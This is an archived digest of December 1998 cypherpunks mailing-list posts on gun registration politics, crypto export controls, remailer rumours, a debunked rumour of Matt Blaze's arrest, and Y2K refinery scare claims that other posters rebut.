The boundaries between NRA and HCI are blurry. I am thinking about leaving
the NRA, but since I am a Life Member, I can at least vote for the NRA
board...

--Lucky, JPFO member and proud of it.

On Tue, 1 Dec 1998, Declan McCullagh wrote:

> 
> At 01:14 PM 12-1-98 -0800, Tim May wrote:
> >As for the privacy implications of the instant check system, I abandoned
> >the NRA a few years ago when it began pushing this instant check system
> >(and also when some of its leaders were lukewarm in their support of gun
> >rights). It was obvious that it would lead to a fully computerized gun
> >registration system, as indeed it has...duh! The NRA claimed it would not,
> >but now they are busy getting ready to sue the FBI and other law enforcment
> >agencies to force them not to retain the information they get from the
> >instant check system. Duh, again. (This was all foreseeable to anyone with
> >half a brain.)
> >
> >The country now has the beginnings of a national gun registration system,
> >courtesy of such "useful idiots" as the National Rifle Association.
> 
> 
> I was chatting for a while this afternoon with Larry Pratt of GOA
> (http://www.gunowners.org/). He pointed out that the NRA's compromising
> stance is not new. They've supported many, many pieces of gun control
> legislation since around the 1930s. Today at their press conference, a
> phlanx of NRA reps stressed that they really want this instant check.
> Necessary for law enforcement, whatever.
> 
> The NRA is the CDT of the gun world.
> 
> Remember when CDT's staff (before they left EFF) cut a deal on the Digital
> Telephony/CALEA bill and endorsed it? Now, years later when some of the
> provisions kick in, they're upset that the Justice Department wants more
> power than the law allows.
> 
> Same thing's happening here with the NRA. What a surprise.
> 
> -Declan
> 
> 
> 


-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 2 Dec 1998 13:35:30 +0800
To: cypherpunks@cyberpass.net
Subject: Re: NZ or LA in Y2K
Message-ID: <199812020501.GAA21822@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:51 AM 12/1/98 -0600, Igor Chudov @ home wrote:
>I am now considering another possibility: what happens if the power DOES
>NOT go out? What would the gunnuts do? 

Um, start shooting the insulators and pole-transformers? :-P 

Or, if the power does go out but
>looting does not start, would the gunnuts shoot some blacks that they
>mistake for "looters" but who are just walking down the streets?

Now you're confusing arms fanciers and survivalists with violent racists.
Get a grip.












  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Wed, 2 Dec 1998 13:40:03 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Fwd: FC: Gun groups take aim at new FBI database
In-Reply-To: <199812020304.TAA04962@smtp.well.com>
Message-ID: <Pine.BSF.3.96.981202060652.24783E-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 1 Dec 1998, Declan McCullagh wrote:


> >http://www.wired.com/news/news/politics/story/16561.html
> >
> >                     Gun Groups Take Aim at Database

"EPIC director Marc Rotenberg likened the plan to driver licensing, adding
that privacy safeguards should be in place."

Well, at least this makes it clear where EPIC stands on civil liberties.
License to exercise your rights under the 2nd, license to exercise your
rights under the 1st...

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Wed, 2 Dec 1998 14:34:31 +0800
To: jim finder <jim_finder@hotmail.com>
Subject: Re: Matt Blaze arrested???
In-Reply-To: <19981202051225.1348.qmail@hotmail.com>
Message-ID: <Pine.BSF.3.96.981202070246.24912B-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 1 Dec 1998, jim finder wrote:

> 
> I heard a shocking thing on the radio a few minutes ago.
> I'm <*really*> sorry I didn't hear the whole report but I'm
> hoping someone here can shed some light,
> 
> According to the report a Bell Labs mathematician named
> Blaze was arrested at the O'Hare airport today, in some
> kind of FBI sting operation.

NFW that Matt would get arrested. He is too high profile. They haven't
become that blatant just yet. Arresting Matt would trigger more pro-bono
work than the DOJ has staff. :-) Besides, Matt would not engage in illegal
activities.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Wed, 2 Dec 1998 21:51:04 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re: I Got Mine
In-Reply-To: <000301be1dc9$357bf260$808195cf@blanc>
Message-ID: <36653E71.6115919@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain





Blanc wrote:

> I received my visit from the friendly IRS guys tonight, asking about CJ/Toto.

[...]

> I discovered things that I didn't know about Toto's situation:
> that he had sent threatening letters to the Mounties, and that he had threated
> to kill the judge trying Jim's case.

I guess investigators have to take such things seriously, that's their job. I
believe CJ was just trying to establish dialogue with *authority* figures, real or
imagined, to satisfy a selfish need for aggrandizement. Well, he got his wish and it
swallowed him whole. May the saints preserve him.[...]

> One of the investigators expressed a great interest in the cpunk dicussions and
> concepts;

Constitutionally guaranteed concepts can be novel and quite interesting.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Wed, 2 Dec 1998 23:21:04 +0800
To: cypherpunks@Algebra.COM
Subject: RE: "Export" controls
Message-ID: <D104150098E6D111B7830000F8D90AE84DDFA9@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain




"Anonymous" wrote:

> >Can you give me an example of a commercial vendor who has suffered
> >because someone bought a "dangerous" product ( Windows, for example ) at
> >retail and carried it out of the country in a suitcase? My guess would
> 
> I cannot give such example because hard crypto products are not available
> to
> the general public.
> 
> I am unaware that microshit OS has hard crypto built-in. The only hard
> crypto
> package I have ever seen for sale at mail-order (and thus not anonymous)
> is
> NAI's PGP (and I have never seen any hard crypto available in a store for
> cash
> - but that can only mean that there is no perceived demand).
> 
	[Trei, Peter]  
	Huh?

	I got my copy of NAI PGP 5.0 off of the shelf at
	CompUSA, a major retail chain (I did pay with plastic,
	but am 99.999...% certain that cash would have been
	accepted). The box *is* marked 'Not for export', but
	I don't recall seeing any other restrictions.

	Either 'anonymous' hasn't looked hard enough, or
	he/she/it's in another country.

	Peter Trei
	ptrei@securitydynamics.com

	[I apologize for the lousy formatting. I'm using
	a Microsoft product to sent this message.]   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 3 Dec 1998 02:41:59 +0800
To: cypherpunks@Algebra.COM
Subject: Re: "Export" controls
Message-ID: <3665810E.1BBD@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> I am unaware that microshit OS has hard crypto built-in.
> 
I was pointing out a retail parallel, not a crypto parallel.
You sure it's not Microshaft? More meanings.

> The question is how to make money by selling hard crypto in the US.
>
A little experiment is often a good thing. I heard that the guys who
made the DES cracker have had $$ requests for machines and/or chips.

> To recap, there are no hard crypto drop-in hardware products
> available to general public in the USA today.
>
In case you missed it, my original reply was an attempt to open
discussion on some type of cooperative effort.

Look at http://www.xilinx.com/products/xc4000XLA.html for prototype
purposes. I wonder how many DES or IDEA engines could be put on a 500K
gate array? It would fit about 35 instantiations of Twofish. That should
be enough for a phone or a disk encryptor.

It's not trivial but -
Products can be done. 
On a shoestring. 
By the right people. 
Even non-geniuses.
Who want to get them done. <-- the key item

No sense pushing the button without critical mass.

sigh...

A friend's t-shirt many years ago:
  A penny for your thoughts, twenty bucks to act them out.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 3 Dec 1998 01:27:27 +0800
To: Anonymous <nobody@replay.com>
Subject: Re: Spy & CounterSpy
In-Reply-To: <199812021445.PAA00469@replay.com>
Message-ID: <36656470.A91D8D66@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
 
> I know this is a little off topic, but has anyone
>  verified the integrity of a web site called
> "Spy & CounterSpy" located at http://www.spycounterspy.com/?
> 
> The site is basically a citizens' guide to
> counterintelligence, and covers topics ranging
> from anonymous email and encryption to evading
> FBI surveillance.
> 
> The author, Lee Adams, claims to have years of
> experience in these areas but I'm wondering if
> this site isn't quite what it appears to be --
> a site put up by some freedom-loving guy who wants
> to help everyone enjoy their privacy.


I'm uncertain as to their intentions.  They do have what seems to be
interesting information as to how Law Enforcement works, but after
subscribing to their "F9" mailing list out of curiosity, it seems that
every other email is a call to join them in their "battle" against
whatever vague enemy they believe they have and to set up "cells."

I don't know if the value of their material and the validity as such,
perhaps a local LEO on this list can verify its accuracy, however,
IMHO, it's best to not get involved with them as they're either very
honest about their intent and thus are in great danger and are a
great danger to others, or are a front for something evil.

What's interesting is that I've not received any more of the F9
messages in a long while, so something is up with them, either that
or because I've shown no interest in joining their "cause"  they've
stopped sending mail.

They're certainly a lot more than just a site put up by freedom 
loving folks, and the web site doesn't display that. 


-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 3 Dec 1998 04:04:17 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: Y2K and Atlas
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B2F4@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain





-----Original Message-----
From: [somebody]
Sent: Tuesday, December 01, 1998 5:04 PM
To: philosophy of objectivism
Subject: For the ARF


Ed Yourdon is name known to aging geeks as the developer of structured 
systems analysis & design.  His text on the subject is still in use in 
C.S. courses around the country.  He's also the author of a dozen or so 
books about programming, particularly mainframe programming.

In early 1998 Yourdon and his daughter Jennifer co-authored "Time Bomb 
2000: What the Year 2000 Computer Crisis Means to You."  (As you might 
infer from the title, the Yourdons aren't exactly sanguine about the 
potential impact of the Y2K problem.)  (Nor am I.)

Yourdon maintains a web site featuring, among many other things, reading 
list both technical and non-technical about programming and Y2K.

Introducing his non-technical list of Y2K books, he recommends Atlas 
Shrugged with the following comment:

>As for Ayn Rand's Atlas Shrugged ... well, you probably read it in 
>college, but you've probably forgotten all about it. You probably don't 
>remember John Galt's famous line, "I will stop the engine of the world."   
>Well, read the book again now, with Y2K-colored glasses, and remember that 
>computer programmers are reading it, too.   The question you need to ask 
>them is whether they intend to stay on the job if the lights go out on 
>January 1, 2000, and whether they feel sufficiently motivated to re-start 
>the engines of the world. If you don't think that's a question worth 
>asking, then you haven't read Atlas Shrugged.

So I guess I'm not the only person to have made that connection... 

http://www.yourdon.com/books/coolbooks/coolby2kother.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Thu, 3 Dec 1998 01:37:52 +0800
To: "jim finder" <jim_finder@hotmail.com>
Subject: Re: Matt Blaze arrested???
In-Reply-To: <19981202051225.1348.qmail@hotmail.com>
Message-ID: <199812021636.LAA22798@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm afraid you're confused.  Whoever this report was about, it
wasn't me:

* I'm not at Lucent Bell Labs. (I'm at AT&T Shannon Labs.)  I'm not
  aware of any other Blaze at either AT&T or Lucent, however.
* I'm not a mathematician. (I'm a computer scientist.)
* I've not been to ORD, or any other midwestern airport,
  since August.  (I do fly a lot, though).
* I never been arrested.  (I did accently set off the antitheft
  detector at a local bookstore once, but they let me go
  when I showed them my reciept).  

-matt

>I heard a shocking thing on the radio a few minutes ago.
>I'm <*really*> sorry I didn't hear the whole report but I'm
>hoping someone here can shed some light,
>
>According to the report a Bell Labs mathematician named
>Blaze was arrested at the O'Hare airport today, in some
>kind of FBI sting operation.  I didn't hear the whole segment,
>but it sounded like it had something to do with passing classified
>(crypto?) information to a foreign government.  The part of
>the report that I heard didn't say what kind of info or what
>he was charged with, but I got the impression that it was either
>some kind of ITAR thing or maybe espionage.  They did
>say it was part of a long term sting operation and mentioned
>something (that I didn't hear clearly) about "other arrests"
>that either already happened or were likely to happen soon.
>
>Was this Matt Blaze?  It sure sounds like it must be.  Is
>there a crackdown going on? Has anyone else been busted?
>
>Does anyone have more complete information about this?
>
>Jim
>
>
>______________________________________________________
>Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Thu, 3 Dec 1998 03:17:50 +0800
To: "Ray Arachelian" <nobody@replay.com>
Subject: RE: Spy & CounterSpy
In-Reply-To: <36656470.A91D8D66@brainlink.com>
Message-ID: <000701be1e23$16e445a0$8e2580d0@ibm>
MIME-Version: 1.0
Content-Type: text/plain



Ray sez:

~> What's interesting is that I've not received any more of the F9
~> messages in a long while, so something is up with them, either that
~> or because I've shown no interest in joining their "cause"  they've
~> stopped sending mail.

That would be a first.

X




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 3 Dec 1998 05:22:56 +0800
To: Blanc <blancw@cnw.com>
Subject: Re: I Got Mine
In-Reply-To: <000301be1dc9$357bf260$808195cf@blanc>
Message-ID: <Pine.BSF.4.02.9812021205100.3865-100000@ideath.parrhesia.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 1 Dec 1998, Blanc wrote:

> I received my visit from the friendly IRS guys tonight, asking about CJ/Toto.
> [...]
> In our conversation, I discovered things that I didn't know about Toto's
> situation [...]

More information is interesting, but it's important to remember that cops
are free to lie to ordinary people and suspects; it's not considered a
violation of your constitutional rights, of the law, or of their
professional standards. Good interrogators/investigators learn to use
social and psychological techniques to gain the results they want - which
may be gaining intelligence, extracting a confession, or isolating a
suspect from their friends/supporters/codefendants.

Just as a reasonable person will likely listen cautiously to an accused
person proclaiming their innocence, a reasonable person should also listen
cautiously when the prosecution proclaims someone's guilt.  

--
Greg Broiles
gbroiles@netbox.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Thu, 3 Dec 1998 03:35:42 +0800
To: Michael Motyka <mmotyka@lsil.com>
Subject: Re: "Export" controls
In-Reply-To: <3665810E.1BBD@lsil.com>
Message-ID: <199812021810.NAA016.22@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



In <3665810E.1BBD@lsil.com>, on 12/02/98 
   at 10:03 AM, Michael Motyka <mmotyka@lsil.com> said:

>You sure it's not Microshaft? More meanings.

I prefer Mickysloth myself as it is more descriptive of their coding style. :)

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>x@z.wyx
Date: Wed, 2 Dec 1998 20:45:06 +0800
To: cypherpunks@Algebra.COM
Subject: Re: "Export" controls
Message-ID: <199812021214.NAA20333@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>Can you give me an example of a commercial vendor who has suffered
>because someone bought a "dangerous" product ( Windows, for example ) at
>retail and carried it out of the country in a suitcase? My guess would

I cannot give such example because hard crypto products are not available to
the general public.

I am unaware that microshit OS has hard crypto built-in. The only hard crypto
package I have ever seen for sale at mail-order (and thus not anonymous) is
NAI's PGP (and I have never seen any hard crypto available in a store for cash
- but that can only mean that there is no perceived demand).

However, any hard crypto that would work on system level and encrypt all
communications is not available for purchase (it is available for free,
though, in the form of IPSec package with 128-bit block ciphers for
*BSD operating systems.)

There is a number of VPN companies that offer crypto boxes, but AFAIK they
either do not mention crypto scheme they use or they say DES. There is
only one VPN company that advertises 128-bit crypto in it's product.

>> [ For example, try to buy one of IBM crypto-cards - give them a call
>> and ask what does it take to purchase one with hard crypto on it
>>
>Save me the phone call and describe your experience. BTW - IBM derives a

You'll miss all the fun. After talking to 5-6 departments one concludes
that no one knows anything about 4758, but they are all nice and helpful,
and forward your call to each other. 4758 does not exist for casual callers.
My guess is that if you have been dealing with IBM for some time you may
be able to get it.

To recap, there are no hard crypto drop-in hardware products available to
general public in the USA today.

>just write a damn book, source, VHDL etc. You can even export that. My

The question is how to make money by selling hard crypto in the US. NAI seems
to be the only company that can get away with so-called "publishing exception"
in the commercial world. Their joining the key recovery alliance is probably
unrelated :-)

>Disk encryptor - SCSI/EIDE, a bump in the wire between the motherboard
>and the disk drive. With its own smartcard/keypad interface, keys are
>never seen by OS. It doesn't solve the security problem while the system

There are many neat ideas. But no hardware.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@vendorsystems.com>
Date: Thu, 3 Dec 1998 03:58:33 +0800
To: cryptography@c2.net
Subject: Re: Matt Blaze arrested???
In-Reply-To: <19981202051225.1348.qmail@hotmail.com>
Message-ID: <v03102801b28b42377f48@[204.1.1.65]>
MIME-Version: 1.0
Content-Type: text/plain



Matt Blaze wrote:

>I'm afraid you're confused.  Whoever this report was about, it
>wasn't me:
>...

Not a important question but isn't this the sort of message that would
benefit most from a PGP signature? I checked on the certserver and it did
locate a 512 bit key RSA key from 1993. I don't routinely sign or encrypt
my email but I remain curious about decisions others make. In a program on
NPR a few years ago I recall a few luminaries were ardently discussing the
issues involved in encryption but when asked late in the program how they
used encrryption themselves they all quickly said that it was just too
cumbersome.

Steve Bryan
Vendorsystems International
email: sbryan@vendorsystems.com
icq: 5263678
pgp fingerprint: D758 183C 8B79 B28E 6D4C  2653 E476 82E6 DA7C 9AC5





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Thu, 3 Dec 1998 02:01:59 +0800
To: holist@mail.matav.hu
Subject: "remailers operated by FBI"
In-Reply-To: <199811261817.KAA27682@toad.com>
Message-ID: <m0zlBUu-0003bAC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain



> I wonder if this is also old hat to you people. If it turns out to
> be another FAQ, I promise to read some.

It is. The rumor of remailers being run by US authorities can be
tracked down to statements by Paul Strassmann of the National Defense
University and William Marlow of SIAC made at a Harvard conference.

The Austrian jurist Viktor Mayer-Schoenberger reported in February 1996:

| Both presenters explicitly acknowledged that a number of anonymous
| remnailers in the US are run by government agencies scanning
| traffic.  Marlow said that the government runs at least a dozen
| remailers and that the most popular remailers in France and Germany
| are run by the respective government agencies in these countries.

However, there has never been any remailer in France, and at that
time, there was no remailer in Germany. It is certainly not true that
dozens or even "all the e-mail anonymiser services" in the US are run
by government agencies. Strassmann and Marlow later claimed that they
had been quoted "out of context". They wrote, "We have no specific
knowledge of any particular agency of any government offering
remailers services.  Whether or how they use remailers is not known to
us.  Online users just need to be 'aware of the risks.'" But
unfortunately rumors are hard to stop.

Anyway, the possibility that some remailers may be compromized is part
of the threat model, and Mixmaster has been designed to be secure as
long as there is one honest remailer in your chains.

More information:

http://caq.com/CAQ57Sniff.html
http://catless.ncl.ac.uk/Risks/ (search for Strassmann Marlow)

About the Mixmaster design:
http://www.obscura.com/~loki/remailer/remailer-essay.html


> The extortionist was sending the notes via e-mail, using what the
> professor referred to as "e-mail anonymiser servers" in the US.

It seems he in fact used a service like hotmail.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 3 Dec 1998 03:18:37 +0800
To: cypherpunks@toad.com
Subject: Re: Spy & CounterSpy
In-Reply-To: <000701be1e23$16e445a0$8e2580d0@ibm>
Message-ID: <36658C71.1D60BE90@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



X wrote:
> 
> Ray sez:
> 
> ~> What's interesting is that I've not received any more of the F9
> ~> messages in a long while, so something is up with them, either that
> ~> or because I've shown no interest in joining their "cause"  they've
> ~> stopped sending mail.
> 
> That would be a first.

All things considered they're advocating shooting people and blowing up
buildings (though in vague terms); that's not exactly something I'd want
to add to my resume or be associated with.  So, no thanks. 


-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Ignoramus)
Date: Thu, 3 Dec 1998 05:26:39 +0800
To: cypherpunks@Algebra.COM
Subject: test1 #1
Message-ID: <199812022039.PAA11521@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain



test 1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chuck McManis <cmcmanis@freegate.com>
Date: Thu, 3 Dec 1998 08:02:57 +0800
To: cypherpunks@cyberpass.net
Subject: Re: L5 algorithm patent, and free eval version
In-Reply-To: <199812022046.VAA14983@replay.com>
Message-ID: <4.1.19981202152724.00a17ea0@mailhost.hq.freegate.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:46 PM 12/2/98 +0100, Anonymous wrote:
>Now that L5 has been patented, will you and your colleagues at Jaws
>Technology make the L5 algorithm details available to the professional
>cryptography community for independant verification. Could you also
>provide the Canadian and/or US patent numbers?

L5 has NOT been patented. The company simply announced it had been
"accepted" which is in itself a non-sequitor since patents aren't
"accepted." My guess is that the patent was filled and the application was
"allowed." This means that the information in the patent has passed the
examiner's preliminary examination for fitness (which is to say it isn't
one of the things that are disallowed by the patent office.) This actually
doesn't mean SQUAT since thousands of patents get "allowed" and then
"returned" because they don't meet more stringent tests such as
non-obviousness, do what the claims say they do, restate prior art, etc,
etc. However I do believe that disclosure at this point would be premature
because some of the things that examiner may ask may require the patent be
rewritten substantially. 

--Chuck




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 2 Dec 1998 23:48:34 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199812021445.PAA00469@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



I know this is a little off topic, but has anyone
 verified the integrity of a web site called 
"Spy & CounterSpy" located at http://www.spycounterspy.com/?

The site is basically a citizens' guide to 
counterintelligence, and covers topics ranging 
from anonymous email and encryption to evading 
FBI surveillance.

The author, Lee Adams, claims to have years of 
experience in these areas but I'm wondering if 
this site isn't quite what it appears to be -- 
a site put up by some freedom-loving guy who wants 
to help everyone enjoy their privacy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 3 Dec 1998 05:36:48 +0800
To: Lucky Green <declan@well.com>
Subject: Re: Fwd: FC: Gun groups take aim at new FBI database
In-Reply-To: <199812020304.TAA04962@smtp.well.com>
Message-ID: <4.0.2.19981202150708.03cb42c0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 06:11 AM 12/2/98 +0100, Lucky Green wrote:
>On Tue, 1 Dec 1998, Declan McCullagh wrote:
>
>
>> >http://www.wired.com/news/news/politics/story/16561.html
>> >
>> >                     Gun Groups Take Aim at Database
>
>"EPIC director Marc Rotenberg likened the plan to driver licensing, adding
>that privacy safeguards should be in place."
>
>Well, at least this makes it clear where EPIC stands on civil liberties.
>License to exercise your rights under the 2nd, license to exercise your
>rights under the 1st...
>
>-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.

Usual car, driver, and gun licensing rant:

While I do not support regulating guns like driving (or indeed driving like
driving), most gun control thugs ignore the fact that vehicle regulation is
not as broad as they seem to think.  

The following statements are true:

It is legal to own a car without a driver's license or vehicle registration.

It is legal to drive an unregistered car without a driver's license (in
some circumstances).

No permission is required to purchase a car and felons, the mentally ill,
children, aliens and those guilty of misdemeanor domestic violence offenses
can buy cars and most of the above can drive cars on public streets and roads.

You are not required to report the purchase of a car to anyone.  

It is legal to drive a car on public streets and roads in the US with a
license from any jurisdiction on earth.

It is legal to drive a car on public streets and roads in the US that is
registered in other states or nations.

It is legal to drive a car on public streets and roads in the US that is
owned by and registered to any person or legal entity.

Legal entities can own and register cars and permit anyone they like to
drive them.

Note that if we regulated guns like driving, the above would mean that you
could buy and use a gun on your own property without licensing,
registration or reporting.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "jim finder" <jim_finder@hotmail.com>
Date: Thu, 3 Dec 1998 06:49:56 +0800
To: mab@research.att.com
Subject: Re: Matt Blaze arrested???
Message-ID: <19981202221915.26253.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



>Date: Wed, 02 Dec 1998 11:36:51 -0500
>From: Matt Blaze <mab@research.att.com>
>
>I'm afraid you're confused.  Whoever this report was about, it
>wasn't me:
>
>* I'm not at Lucent Bell Labs. (I'm at AT&T Shannon Labs.)  I'm not
>  aware of any other Blaze at either AT&T or Lucent, however.
>* I'm not a mathematician. (I'm a computer scientist.)
>* I've not been to ORD, or any other midwestern airport,
>  since August.  (I do fly a lot, though).
>* I never been arrested.  (I did accently set off the antitheft
>  detector at a local bookstore once, but they let me go
>  when I showed them my reciept).  
>
>-matt
>

Thanks for clarifying this!  I'm very sorry to have
started an unfounded rumor but I'm glad to know
that you haven't been arrested.  Thankfully, it looks like
everyone assumed that I was just making this up, so I hope
no serious damage was done and that the rumor didn't spread.

That said, there <*was*> a radio report.  It was on WBEZ 91.5
last night, and, as I said, I only heard the last part of the
report.  It was a news report about an arrest made at the
O'Hare airport for something involving mathematics
and foreign governments.  I was almost 100% sure they
said it was Blaze of Bell Labs who was arrested, but
I guess it possible that I misheard.  Perhaps they were
quoting you or talking about you for some other reason.
I remember that someone at bell labs (you???) had some problems
with export authorities a few years ago, and maybe this is what
they were talking about?

Anyway, has anyone heard any more about this story, now that
we know it wasn't Matt Blaze who was arrested?

Humble Apologies,

Jim

PS I'm using a non-work account because I work for a
large Chicagoland company that does some crypto business
and I <*do not*> want to be seen as representing them on the
cypherpunks list.  Some of the work they do goes against
cypherpunk (and my own) goals, and I'd rather not have
people think I'm speaking for them.


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ostreamH <fireman@shaw.wave.ca>
Date: Thu, 3 Dec 1998 06:44:05 +0800
To: cypherpunks@cyberpass.net
Subject: Re: y2k+oil refineries
In-Reply-To: <199812012241.XAA19806@replay.com>
Message-ID: <XFMail.981202171540.fireman@shaw.wave.ca>
MIME-Version: 1.0
Content-Type: text/plain



Assuming most power plants are similar, all control instrumentation
must have some way to bypass the computers in case of emergency. The
pulp and paper mill I worked in lost +1M$ / day of downtime so when 
a controller went down, the process that was effected went on manual
bypass and everything continued to run. And yes, all "embedded" systems
were eaisly accessable for quick repair/replacement. 

On 01-Dec-98 Anonymous wrote:
> North's "scrap the refinery, the chip broke" scenario was forwarded to
> comp.software.year-2000 by Paul Milne, resident doomsayer, foul-mouthed
> religious fanatic, economic Marxist, and all around kook.  It prompted a
> very knowledgable reply which pointed out how silly the whole idea was,
> from someone with relevant experience.  Maybe next time Detweiler could
> check c.s.y2k to filter out North's nuttier ideas before forwarding
> them here.
> 
> 
> Author: SAG
> Email: stephen.and.marilyn.goldstein@worldnet.att.net
> Date: 1998/12/01
> 
> fedinfo@halifax.com wrote:
>> 
>> From GN:
>> 
>> Category:
>>  Noncompliant_Chips
>> Date:
>>  1998-11-30 13:28:22
>> Subject:
>>  Fuel Production Plants
>> 
>> * * * * * * * *
>> 
>> I have one very, very reliable source within that industry who tells me that
>> the oil refining industry can't cope with the task. I am told that the
>> problem
>> of embedded systems can NOT be fixed EVER, no matter how much time were
>> allowed. WHY? Because the refineries themselves would have to be dismantled
>> to
>> uncover these embedded systems. Essentially, the refineries would have to be
>> destroyed and rebuilt!!! These embedded systems are buried within enclosed
>> systems. Identifying, testing and replacing these systems is too
>> impractical.
>> It is financially unsound to do so. The better option is to build new ones.
>> There is no time to do this with less than 400 days left and the time to
>> build
>> a new refinery is 3 to 5 years.
>> 
>> So, what does this mean? My sources, especially the most reliable source
>> tell
>> me that it means that on January 1, 2000... the oil and gas refineries will
>> cease operations. These facilities also have converted their inventory
>> management control systems to small inventory levels so that inventory
>> levels
>> are running about 1 to 2 days capacity. A few years ago, the industry
>> averaged
>> a 1 to 6 month supply in storage tanks. Not so today.
>> 
>> The results: By 1/5/2000 there will be no gasoline, no diesel fuel, no
>> natural gas, no heating oil, no fuel oil products at all. This means trains
>> will have no fuel. Trucks will have no fuel. Cars will have no fuel.
>> Electric
>> Power Plants will have no oil for fuel, nor coal... because there will be no
>> fuel to power the vehicles to get it to them. So, there will be no
>> electricity. And you know the remaining domino schematic from that point.
>> 
>> ======
>> 
>> I have no way of knowing whether the embedded systems are just that,
>> embedded
>> in such a way that they can not be accessed. I imagine that some could be
>> under fifty feet of concrete or otherwise inaccessable. If this is so, then
>> there is not the slightest doubt at all, that it is indeed all over. Period.
>> 
>> I am not going to bandy about the issue of whether this source is reliable
>> or
>> not. It makes no difference. The only thing I am concerned with is whether
>> these systems are in fact inaccessable. I know that not every system is
>> inaccessable. The question is whether there are enough inaccessable systems
>> to
>> mean that the refineries etc. will not function.
